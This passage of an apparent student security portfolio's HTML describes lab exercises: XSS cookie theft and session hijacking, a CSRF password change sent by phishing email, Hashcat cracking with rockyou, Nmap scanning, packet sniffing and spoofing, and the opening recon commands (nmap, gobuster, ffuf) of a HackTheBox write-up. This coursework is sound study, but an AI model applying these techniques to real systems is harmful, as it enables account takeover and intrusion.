          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
